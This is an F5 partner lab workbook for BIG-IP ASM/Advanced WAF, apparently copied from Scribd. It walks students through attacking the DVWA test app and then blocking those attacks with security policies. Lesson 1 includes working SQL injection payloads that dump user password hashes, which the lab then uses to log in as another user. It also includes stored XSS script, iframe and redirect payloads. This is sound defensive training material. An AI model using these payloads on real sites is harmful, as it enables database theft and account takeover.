0% found this document useful (0 votes)

630 views121 pages

PBC - ASM AWAF Full Course - Workbook - v15.1 2020-07-06

This document provides exercises to accompany lessons for the BIG-IP Application Security Manager (ASM) and Advanced WAF course. The exercises guide students to complete hands-on tasks related to ASM features, including creating security policies, using file type enforcement, policy building for trusted and untrusted requests, staging and enforcing entities, using attack signatures, brute force protection, CSRF and parameter tampering protection, geolocation enforcement, data guard and PCI compliance, parent and child security policies, login enforcement and violation detection, cookie hijacking protection, layer 7 DOS and bot defense protection, distributed brute force and credential stuffing protection, and behavioral DOS protection.

Uploaded by

Luan Jacobina

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

630 views121 pages

PBC - ASM AWAF Full Course - Workbook - v15.1 2020-07-06

Uploaded by

Luan Jacobina

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 121

PBC – 3-day Partner

BIG-IP ASM / AWAF Course

Hands-On Exercise Guide – UDF Version

Document version 15.1A

Written for: TMOS® Architecture v15.1.0.0.0.31

F5 Worldwide Field Enablement Last Updated: 7/22/2020

Learn More, Sell More, Sell Faster
UDF Environment Diagram

©2020 F5 Networks, Inc. All rights reserved. F5, F5 Networks, and the F5 logo are trademarks of F5 Networks, Inc. in the U.S. and in certain
other countries. Other F5 trademarks are identified at f5.com.

Any other products, services, or company names referenced herein may be trademarks of their respective owners with no endorsement or
affiliation, express or implied, claimed by F5.

These training materials and documentation are F5 Confidential Information and are subject to the F5 Networks Reseller Agreement. You
may not share these training materials and documentation with any third party without the express written permission of F5.
Table of Contents

Application Security Manager ........................................................................................................................... 1

ASM Lesson 1 – Application Security Overview and Security Policies ....................................................... 1
Exercise – Create an ASM Security Policy ..................................................................................................... 2
ASM Lesson 2 – File Type Enforcement ........................................................................................................ 7
Exercise – Use File Type Enforcement .......................................................................................................... 8
ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests .................18
Exercise – Use Policy Building with Trusted and Untrusted Requests .....................................................19
ASM Lesson 4 – Learning, Staging, and Enforcement................................................................................25
Exercise – Stage and Enforce Entities .........................................................................................................26
ASM Lesson 5 – Attack Signatures ..............................................................................................................33
Exercise – Use ASM Attack Signatures ........................................................................................................34
ASM Lesson 6 – Brute Force Protection .....................................................................................................41
Exercise – Use Brute Force Protection........................................................................................................42
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement ..48
Exercise – Add CSRF and Parameter Tampering Protection, and Geolocation Enforcement.................49
ASM Lesson 8 – Data Guard and PCI Compliance ......................................................................................59
Exercise – Use Data Guard and Attain PCI Compliance .............................................................................60
ASM Lesson 9 – Parent and Child Security Policies....................................................................................65
Exercise – Use Parent and Child Security Policies ......................................................................................66
ASM Lesson 10 – Login Enforcement and Violation Detection .................................................................73
Exercise – Use Login Enforcement and Violation Detection .....................................................................74
ASM Lesson 11 – Cookie Hijacking Protection ...........................................................................................81
Exercise – Use Cookie Hijacking Protection................................................................................................82
ASM Lesson 12 – Layer 7 Denial-of-Service and Bot Defense Protection ...............................................87
Exercise – Use Layer 7 DoS and Bot Defense Protection...........................................................................88
ASM Lesson 13 – Distributed Brute Force and Credential Stuffing Protection .......................................97
Exercise – Use Distributed Brute Force and Credential Stuffing Protection ............................................98
ASM Lesson 14 – Behavioral DoS Protection ...........................................................................................106
Exercise – Use Behavioral DoS Protection ................................................................................................107
ASM Lesson 15 – DataSafe ........................................................................................................................112
Exercise – Use DataSafe Protection ..........................................................................................................113
ASM Lesson 1 – Application Security Overview and Security Policies

Application Security Manager

ASM Lesson 1 – Application Security Overview and
Security Policies

NOTES

________________________________________________________________________________________

________________________________________________________________________________________
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 1
ASM Lesson 1 – Application Security Overview and Security Policies

Exercise – Create an ASM Security Policy

• Estimated completion time: 30 minutes

Task 1 – Access Your Class Application Portal

Use a web browser to access your class application portal.

− Open the email from your instructor containing the class application links, and then click the link assigned to you.
This opens your class application portal.
− For the Windows Jumpbox image click RDP, and then log in as external_user / admin.F5demo.com
− From the desktop open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { }
} security-log-profiles add { "Log all requests" } pool dvwa_pool

Task 2 – Verify Web Site Vulnerabilities

Access the DVWA web application and attempt two well-known attacks against the application.

− Open a new Firefox window and click the DVWA bookmark, and then log in as hacker / hackyou.

SQL Injection
− On the navigation menu click SQL Injection, then type 6 in the User ID field, and then click Submit.
The purpose of this feature is to print the ID, first name, and surname of the submitted user ID. This is the
expected behavior of this feature.
− Copy and paste the following in the User ID field, and then click Submit. (NOTE: Use the copy and paste guide
inside the Documents directory.)
%' or 1='1

You are presented with all the users in the database.

− Copy and paste the following in the User ID field, and then click Submit.
' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

This statement returns the user ID, first name, last name, user name, and password (in a hash format) of all users
in the users table.
− Note that there is a user named Victim User with the username of “victim”.
− Select the hashed password value for victim, and then right-click and select Search Google for “8a24367a1f4…”.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 2
ASM Lesson 1 – Application Security Overview and Security Policies
− Select the first link with the decoded hash value and note the decoded password value.

The decoded value is “P@ssw0rd!”.

− Close the tab, then on the DVWA page click Logout, and then log back in as victim / P@ssw0rd!
At the bottom of the page note that we’ve successfully logged in with another user’s credentials.
A successful SQL injection exploit can read sensitive data from the application database, modify database data,
or even delete data or the entire database.

Cross-Site Scripting
− Click XSS stored, then create an entry named Review, then copy and paste the following Review, and then
click Submit Review.
This web site is very useful. It’s helped me understand the vulnerabilities that my web application has. I
guess my web developers aren’t as skilled as I thought they were.

This feature enables users to request make web site comments. This is the expected behavior of this feature.
− Create another entry named Attack, then copy and paste the following Review, then click Submit Review,
and then click OK.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

This message is written in JavaScript code.

− Open Internet Explorer and click the DVWA bookmark, then log in as bobsmith / password, and then
click XSS stored.
The user is presented with an alert dialog box that was written by the hacker.
− Click OK, and then click Home.
− In the Firefox window (the hacker’s window) create another entry named Virus, then copy and paste the
following Review, and then click Submit Review. (and click OK at the dialog box.)
<iframe src="https://cdn2.hubspot.net/hub/2683519/hubfs/signal_images/articles/article-
5469925982/dangerous%20website.jpg?width=640&name=dangerous%20website.jpg" width="650" height="320"></iframe>

− In the Internet Explorer window (for bobsmith) click XSS stored and click OK, and then scroll down the page.

→NOTE: It’s possible this URL may no longer work, based on when you are doing this exercise.

The hacker used an iframe script to display a dangerous web site on the legitimate web page. All users will see
this page when they access this comments page.
− Click Home.
− In the Firefox window (the hacker’s window) click Setup, and then click Create / Reset Database.
This will remove the previous three entries.
− Click XSS stored, then create another entry named Command line, then copy and paste the following Review, then
click Submit Review, and then click the DVWA bookmark.
<script>window.location=" http://hackertyper.net"</script>

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 3
ASM Lesson 1 – Application Security Overview and Security Policies
− In the Internet Explorer window (for bobsmith) click XSS stored.
The user is now immediately redirected to what appears to be a command line (which is actually a web page
meant to fool the victim).

Cross-site scripting is a powerful exploit because a hacker can insert any form of script code into the database.
Another thing to keep in mind: The hacker was able to insert all the cross-site script attacks while logged into the
web application as the user account victim (which he accessed from the successful SQL injection attack).
− Close Internet Explorer.
− In the Firefox window click Setup, and then click Create / Reset Database.

Task 3 – Create a Security Policy using Rapid Deployment

Create a security policy using the Rapid Deployment policy template.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Virtual Server List page and click dvwa_virtual.
This virtual server was created by the TMSH command in task 1 and is the unprotected virtual server you were
attacking. It uses the IP address 10.1.10.35 and port 80. Notice that this virtual server is configured with the
default http profile, which is required when using an ASM security policy.
− Open the Security > Application Security > Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment Policy
Virtual Server dvwa_virtual (HTTP)
Enforcement Mode Blocking
Signature Staging Disabled

That’s all it takes to create a basic security policy with BIG-IP ASM. Using Rapid Deployment includes several
common security measures and thousands of attack signatures.

Task 4 – Re-attempt to Attack the Web Application

Re-attempt the attacks against the DVWA web application, and then use the BIG-IP ASM event log for detailed
information on the malicious requests.

− Once the policy is created, in the DVWA page (in Firefox) click SQL Injection, then copy and paste the following
in the User ID field, and then click Submit.
%' or 1='1

The SQL injection attempt is blocked by ASM.

− Click the DVWA bookmark (don’t click the Back button), then click XSS stored, then create an entry
named My attack, then copy and paste the following Review, and then click Submit Review.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 4
ASM Lesson 1 – Application Security Overview and Security Policies
− Click the DVWA bookmark, then click XSS stored, then create an entry named Virus, then copy and paste the
following Review, and then click Submit Review.
<iframe src="https://cdn2.hubspot.net/hub/2683519/hubfs/signal_images/articles/article-
5469925982/dangerous%20website.jpg?width=640&name=dangerous%20website.jpg" width="650" height="320"></iframe>

Both cross-site scripting attempts are blocked by ASM.

− Close Firefox.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Click the filter icon.

− For Request Status select Blocked, and then click Apply Filter.
There are three blocked log entries.
− Select the /vulnerabilities/sqli/ log entry and click Attack signature detected.

ASM provides details about the different violation types.

− Under Occurrences click 2.

You can see exactly what text the attacker input into the field, the attack signature that was matched, and the
parameter the hacker tried to exploit (id).
− Examine the Violation Rating and Attack Types values.

This request was blocked because it was recognized as SQL injection.

− Click SQL-Injection.
ASM provides details about the different attack types.
− Select the first /vulnerabilities/xss_s/ log entry and under Occurrences click 3, and then scroll down to view the
different matched attack signatures.
This request matched multiple attack signatures (for the script tag and alert () ) in the mtxMessage parameter.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 5
ASM Lesson 1 – Application Security Overview and Security Policies
− Select the second /vulnerabilities/xss_s/ log entry and under Occurrences click 2, and then scroll down to view the
different matched attack signatures.
This request matched multiple attack signatures (for the iframe tag and src https ) in
the mtxMessage parameter.
− Examine the Violation Rating and Attack Types values.
This request was blocked because it was recognized as cross-site scripting.
− Examine the Decoded Request section.
You can view the entire HTTP request, including the request line, all HTTP request headers, and the request
body. This enables the security administrator to view exactly what text was input into the form by the attacker.

PREPARE FOR NEXT EXERCISE

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 6
ASM Lesson 2 – File Type Enforcement

ASM Lesson 2 – File Type Enforcement

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 7
ASM Lesson 2 – File Type Enforcement

Exercise – Use File Type Enforcement

• Estimated completion time: 45 minutes.

Task 1 – Verify Forceful Browsing Vulnerabilities

Use a web browser to access the DVWA web site and attempt forceful browsing attacks.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open a new Firefox window and click the DVWA bookmark, and then change the URL to http://10.1.10.35/php.ini.

− Change the URL to http://10.1.10.35/README.md, and examine the following text in the middle of the page:

− Click the DVWA bookmark, and then attempt to log in as admin / password.
These are examples of confidential files that are not accessible through web links but are present within the web
server directory. A forceful browsing attack aims to access resources that are not referenced by the web
application but are still accessible.
− Click Logoff, and then close the DVWA page.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 8
ASM Lesson 2 – File Type Enforcement

Task 2 – Configure a Security Policy to Learn File Types

Create a security policy for dvwa_virtual, and then configure it to learn file types.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Virtual Server List page and click dvwa_virtual, and then open the Resources page.
− In the iRules section click /Common/random_ip_addresses.
This iRule was added to the virtual server using the TMSH command. This iRule will simulate each client request
coming from a unique worldwide IP address.
− Open the Application Security > Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment Policy
Virtual Server dvwa_virtual (HTTP)

− Once the policy is created click dvwa_security_policy.

− Under the Advanced settings, for Trust XFF Header select the Enabled button, and then click Save.

This setting will enable ASM to use the X-Forwarded-For value (from the iRule) as the IP address of each
incoming request.
− Open the Application Security > Policy Building > Learning and Blocking Settings page.
− Expand File Types.

− From the Learn New File Types list select Always.

− For the Illegal file type violation select the Learn, Alarm, and Block checkboxes.

− Click Save, and then click Apply Policy.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 9
ASM Lesson 2 – File Type Enforcement

Task 3 – Generate Learning Suggestions for the Security Policy

Use the DVWA site to generate learning suggestions for dvwa_security_policy.

− Open the Application Security > Policy Building > Traffic Learning page.
There are no learning suggestions.
− Generate web application traffic:
o Open a New private window (Firefox) and click the DVWA bookmark, and then log in
as bobsmith / password.

→NOTE: You need to use a New private window to ensure that the browser doesn’t create the web page using
cached content.

o Near the bottom of the page click to view the user policy, and then click the link to return to
the main DVWA page.
o Near the bottom of the page click to view the PDF file, and then click the DVWA bookmark.
o Click Instructions, then click Setup, and then click SQL Injection.
o Click Logout, then click the DVWA bookmark, and then change the URL to http://10.1.10.35/php.ini.
o Change the URL to http://10.1.10.35/README.md, and then close the Firefox window.

→NOTE: Remember: learning suggestions may come from malicious requests.

− In the Configuration Utility reload the Traffic Learning page.

There are now several learning suggestions.
− Select the Add File Type suggestion for php and view the data in the middle of the page.

Questions:
What is the current learning score for php? __________________

How many sample requests were used for this suggestion? _______________________

− Select the Add File Type suggestion for md and view the data in the middle of the page.

Questions:
What is the current learning score for md? __________________

How many sample requests were used for this suggestion? _______________________
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 10
ASM Lesson 2 – File Type Enforcement

Task 4 – Adjust the Policy Learning Speed

Use the Learning and Blocking Settings page to adjust the speed that ASM uses for learning suggestions.

− Open the Application Security > Policy Building > Learning and Blocking Settings page.
− At the bottom of the page select the Advanced settings.

− Expand Loosen Policy, and then for Untrusted Traffic update the values as follows:

− Click Save, then click Apply Policy.

− Generate web application traffic:
o Open a New private window (Firefox) and click the DVWA bookmark, and then log in
as bobsmith / password.
o Near the bottom of the page click to view the user policy, and then click the link to return to
the main DVWA page.
o Near the bottom of the page click to view the PDF file, and then click the DVWA bookmark.
o Click Instructions, then click DVWA Security, then click About, then click Logout,
and then close the Firefox window.
− In the Configuration Utility open Traffic Learning page, and then examine the updated learning scores.
− Select the Add File Type suggestion for php and examine the number of sample requests and the number of
total requests.
− In the list of samples select the first URL in the list, and then view the details on the right-side of the page.

Questions:
What geolocation was this request from? __________________

What was the Attack Type? _______________________

What was the full HTTP request line? _____________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 11
ASM Lesson 2 – File Type Enforcement
− Generate web application traffic:
o Open a New private window (Firefox) and click the DVWA bookmark, and then log in as bobsmith.
o Click to view the user policy, and then click the link to return to the main DVWA page.
o Click to view the PDF file, and then click the DVWA bookmark.
o Click Setup, and then click Logout.
o Change the URL to http://10.1.10.35/README.md, and then close the Firefox window.
− In the Configuration Utility reload the Traffic Learning page and examine the updated learning scores.
− Select the Add File Type suggestion for php and examine the number of sample requests and the number of
total requests.
− Select the Add File Type suggestion for pdf and examine the number of sample requests and the number of
total requests.
− Generate web application traffic:
o Open a New private window (Firefox) and click the DVWA bookmark, and then log in as bobsmith.
o View the user policy, then return to the main DVWA page.
o View the PDF file, and then close the Firefox window.
− In the Configuration Utility reload the Traffic Learning page, and then select the Add File Type suggestion for php.

Questions:
What is the current learning score for php? __________________

How many sample requests were used for this suggestion? _______________________

− Select the Add File Type suggestion for md.

Questions:
What is the current learning score for md? __________________

How many sample requests were used for this suggestion? _______________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 12
ASM Lesson 2 – File Type Enforcement

Task 5 – Manually Add Files Types to the Security Policy

Select the file types needed for the web application and accept them to dvwa_security_policy.

− Select the Add File Type suggestion for php.

− On the right-side of the page select Related Suggestions > Suggestions with the same section.

We can quickly see all file type suggestions for this security policy.
− Click on the Open Filter icon, and then select Advanced Filter.

− Adjust the Learning Score slider to 25 – 100, and then click Apply Filter.
There should be 10 learning suggestions for css, gif, html, ico, jpg, js, no_ext, pdf, php, and png.
We’ve identified that these are all valid file types needed for this web application.
− Click the Select all items checkbox.

− Examine the details in the middle of the page.

Notice that the Action for each of these suggestions is Add File Type.

− Click Accept and identify the two options.

Accept suggestions edits the security policy by performing the Action.
Accept suggestions and enable staging on entities accepts the suggestions and places the entities in staging.
− Select Accept suggestions and enable staging on entities.

This adds these file types to this security policy and keeps them in staging.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 13
ASM Lesson 2 – File Type Enforcement
− Click on the Open Filter icon, then adjust the Learning Score slider to 0 – 24, and then click Apply Filter.
We do not want to add these two file types to the security policy.
− Click the Select all items checkbox, and then click Ignore.
If we were to select Delete, these file types could re-appear in the suggestion list if they are requested again.
− Open a New private window (Firefox) and click the DVWA bookmark, and then change the URL
to http://10.1.10.35/private.txt.
− Change the URL to http://10.1.10.35/README.md, and then close the Firefox window.
− In the Configuration Utility reload the Traffic Learning page.
There is a new Add File Type suggestion for txt, but there isn’t one for md, because we selected to ignore the
original suggestion.
− Open the Application Security > File Types > Allowed File Types page.

− Select the * checkbox, and then click Delete and then OK, and then click Apply Policy.
− Open a New private window (Firefox) and click the DVWA bookmark, and then change the URL
to http://10.1.10.35/php.ini.

Questions:
Were you able to access the ini file? _________________________

Why is BIG-IP ASM still allowing access to illegal file types? ___________________________

− In the Configuration Utility open the Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Mouse over the exclamation point (!) icon in the log entry.

Questions:
Are requests for ini files legal, illegal, or blocked? ____________________

What do you need to configure in BIG-IP ASM to block access to these file types?

_______________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 14
ASM Lesson 2 – File Type Enforcement

Task 6 – Modify the Security Policy’s Enforcement Mode

Update the dvwa_security_policy enforcement mode to Blocking mode.

− Open the Security > Security Policies > Policies List page and click dvwa_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Enforcement Mode select the Blocking button, and then click Save, and then click Apply Policy.
− In Firefox reload the http://10.1.10.35/php.ini page.
− Change the URL to http://10.1.10.35/README.md.
− Change the URL to http://10.1.10.35/private.txt.
All three illegal requests are now blocked by BIG-IP ASM; however, the blocking page is very basic.
− In the Configuration Utility under Security Policy Configuration click Response and Blocking Pages.
− For Blocking Page Default, from the Response Type list select Custom Response.

− Copy and paste the following into the Response Body. (Be sure to replace the existing content.)
<html><head><title>Illegal Request</title></head>
<body>For security purposes, Lorax Investments has blocked this <font color=red>illegal
request</font>.<br><br>
You can contact our technical support department and supply them with the following support ID:
<b><%TS.request.ID()%></b><br><br><a href='javascript:history.back();'>[Go
Back]</a></body></html></body></html>

− Click Save, and then click Apply Policy.

− Reload the blocked page.
− Copy the support ID number of the blocked request, and then close the blocked page.
− In the Configuration Utility open the Event Logs > Application > Requests page.
− Click the Open Filter icon.

− Paste the value you copied into the Support ID field, and then click Apply Filter.
− Under Occurrences click 1.

The request was blocked because it was an Disallowed File Type for the txt file type.
− In the Attack Types row click Forceful Browsing.
BIG-IP ASM provides details about attack types.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 15
ASM Lesson 2 – File Type Enforcement

PREPARE FOR NEXT EXERCISE

Question and Answer Key

Task 3 – Generate Learning Suggestions for the Security Policy
Q: What is the current learning score for php?
A: 5%

Q: How many sample requests were used for this suggestion?

A: 1

Q: What is the current learning score for md?

A: 5%

Q: How many sample requests were used for this suggestion?

A: 1

Task 4 – Adjust the Policy Learning Speed

Q: What geolocation was this request from?
A: Answers will vary.

Q: What was the Attack Type?

A: N/A (it wasn’t an attack.)

Q: What was the full HTTP request line?

A: Answers will vary (It may be GET /logout.php HTTP/1.1)

Q: What is the current learning score for php?

A: 100%

Q: How many sample requests were used for this suggestion?

A: Answers will vary, but it should be around 10.

Q: What is the current learning score for md?

A: 20%

Q: How many sample requests were used for this suggestion?

A: 2

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 16
ASM Lesson 2 – File Type Enforcement
Task 5 – Manually Add Files Types to the Security Policy
Q: Were you able to access .ini file?
A: Yes

Q: Why is BIG-IP ASM still allowing access to illegal file types?

A: The security policy is still in transparent mode.

Q: Are requests for .ini files legal, illegal, or blocked?

A: Illegal

Q: What do you need to configure in BIG-IP ASM to block the illegal file types?
A: Move the security policy to blocking mode.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 17
ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests

ASM Lesson 3 – Manual vs Automatic Policy Building, and

Trusted vs Untrusted Requests

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 18
ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests

Exercise – Use Policy Building with Trusted and Untrusted

Requests
• Estimated completion time: 45 minutes.

Task 1 – Create a Security Policy Manually Using Untrusted Requests

Create an ASM security policy using manual learning and using untrusted requests, then visit the DVWA web
application and view the details in the BIG-IP ASM Traffic Learning page.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment
Virtual Server dvwa_virtual (HTTP)

− Once the policy is created open the Application Security > Policy Builder > Learning and Blocking Settings page.
− Expand File Types, and then from the Learn New File Types list select Always.
− Collapse File Types, then expand Parameters, and then from the Learn New Parameters list select Always.
− Collapse Parameters, then expand URLs, and then from the Learn New HTTP URLs list select Always.
− Click Save, and then click Apply Policy.
− Open a New private window (Firefox) and click the iMacros button.

− In the iMacros pane select Exercises > manual build.iim, and then click Play (Loop).
This macro simulates requests for several URLs and parameters on the DVWA web application.
− Once the macro has completed close the Firefox window.
− In the Configuration Utility open the Application Security > Policy Building > Traffic Learning page.
There are several learning suggestions for Add File Type, Add URL, Add Parameter, and Add Enforced Cookie.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 19
ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests
− Scroll through the list and view the learning suggestion scores for the different suggestions.
All learning suggestions have a learning score of 5%.
− Select the Add File Type learning suggestion for php and examine the details in the middle of the page.

Although the iMacro visited several php web pages, the policy builder only used a single php file type request
for this learning suggestion. Also note that the request came from a single untrusted source.
− Open a New private window (Firefox) and in the iMacros pane select Exercises > manual build.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility reload the Traffic Learning page and examine the learning suggestion scores.
The learning suggestion scores didn’t increase.
− Select the Add File Type learning suggestion for php and examine the details in the middle of the page.
There is still only one sample from this untrusted source. When using untrusted requests, there needs to be
several requests from several unique sources over time to see an increase in the learning scores.

Task 2 – Add a Trusted IP Address Range

Add the IP address range of 10.1.10.0/255.255.255.0 as a trusted source, and then simulate traffic again and view
the results on the Traffic Learning page.

− Open the Application Security > IP Addresses > IP Address Exceptions page and click Create.
We use this page to add a trusted IP address or IP address range for the security policy.
− Use the following information for the trusted IP, and then click Create.
IP Address 10.1.10.0
Netmask 255.255.255.0
Policy Builder trusted IP Enabled
The Windows Jumpbox IP address is 10.1.10.199.
− Open the Learning and Blocking Settings page, and at the bottom of the page expand Trusted IP Addresses.

10.1.10.0 is now a trusted source for building this security policy. NOTE: We could have added this
trusted IP address range when we created the security policy.
− Expand Loosen Policy and examine the Trusted Traffic values.
It will only take a single request from a trusted source to affect the learning score.
− Click Apply Policy.
− Open a New private window (Firefox) and in the iMacros pane select Exercises > manual build.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 20
ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests
− In the Configuration Utility open the Traffic Learning page and examine the updated learning scores.

Questions:
What are the current learning scores for all suggestions? __________________

Why did the scores go up so quick? __________________________________________

Now that the learning suggestions are at 100%, why didn’t ASM accept them into the policy?

________________________________________________________________________

Task 3 – Create a Security Policy Automatically Using Trusted Requests

Create a security policy using automatic learning and using trusted requests, then visit the DVWA web application,
and then view the results in the security policy.

− Open the Policies List page, then select the dvwa_security_policy checkbox, and then click Delete and then OK.
(HINT: You can simply click on “Application Security”.)
− Click Create, and then use the following information for the new policy:
Policy Name dvwa_security_policy
Policy Template Fundamental
Virtual Server dvwa_virtual
Application Language Unicode (utf-8)
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

Notice that we can also add the trusted IP address(es) while creating the security policy.

Questions:
What is the default Learning Mode when using Fundamental? __________________

What is the default Enforcement Mode when using Fundamental? _________________

− Click Save.
− Once the policy is created open the Learning and Blocking Settings page.
− Expand File Types, and then from the Learn New File Types list select Always.
Notice that the Fundamental policy template includes the Learn, Alarm, and Block checkboxes for
all File Types violations.
− Collapse File Types, then expand Parameters, and then from the Learn New Parameters list select Always.
Notice that the Fundamental policy template includes very few parameters settings.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 21
ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests
− Select the Learn, Alarm, and Block checkboxes for all parameter violations.

− For Parameter Level select the URL option.

Using parameters at the URL level enables more granular security than at the global level.
− Select the Classify Value Content of Learned Parameters checkbox.

This enables the policy builder to identify the type of data being submit into different parameters.
− Collapse Parameters, then expand URLs, and then from the Learn New HTTP URLs list select Always.
− Select the Learn, Alarm, and Block checkboxes for the Illegal URL violation.

− Click Save, and then click Apply Policy.

− Open a New private window (Firefox) and in the iMacros pane select Exercises > auto build.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility open the Traffic Learning page.

Questions:
Are there any suggestions for Add File Type, Add URL, or Add Parameter? ________

If not, why not? _____________________________________________________________

− Click the Open Filter icon.

− From the Status list select Accepted and Staged, and then click Apply Filter.
− Scroll through the list and view the learning suggestion scores for the different suggestions.
All Add File Type, Add URL, and Add Parameter suggestions have a learning score of 100% because the requests
came from a trusted IP address. All learning suggestions were also accepted and added to the security policy
upon reaching 100% because you’re using automatic policy building.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 22
ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests
− On the right-side of the page in the Traffic Learning Summary section, expand
the Enforcement Readiness Summary section.

From this section you can see how many file types, URLs, parameters, cookies, and signatures have been added
to the security policy.
− Open the Application Security > File Types > Allowed File Types page.
Around 9 file types have been added to the file type whitelist.
− Open the Application Security > URLs > Allowed URLs page.
Around 26 URLs have been added to the URL whitelist.
− Open the Application Security > Parameters > Parameters List page.
Around 23 or 24 parameters have been added to the parameter whitelist.
− Examine the values in the Parameter Level column.
Each parameter has been associated with a specific URL. Notice there are two Login, Submit, id, password,
and username parameters (the username parameters will be found on page 2), each found on different URLs.

→NOTE: It’s OK if you don’t currently have two Login, Submit, id, password, and/or username parameters,
the security policy will be updated in the next exercise.

Question and Answer Key

Task 2 – Add a Trusted IP Address Range
Q: What are the current learning scores for all suggestions?
A: 100%

Q: Why did the scores go up so quick?

A: We are generating the learning suggestions from a trusted source (10.1.10.199, the Windows
workstation).

Q: Now that the learning suggestions are at 100%, why didn’t ASM accept them into the policy?
A: The security policy is in manual learning mode; therefore, all suggestions must be manually
accepted by an administrator.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 23
ASM Lesson 3 – Manual vs Automatic Policy Building, and Trusted vs Untrusted Requests
Task 3 – Create a Security Policy Automatically Using Trusted Requests
Q: What is the default Learning Mode when using Fundamental?
A: Automatic mode

Q: What is the default Enforcement Mode when using Fundamental?

A: Blocking mode

Q: Are there any suggestions for Add File Type, Add URL, or Add Parameter?
A: No

Q: Why or why not?

A: All learning suggestions came from a trusted source and therefore received learning scores of
100%. Because the security policy is in automatic mode, all these suggestions are immediately
accepted to the security policy.

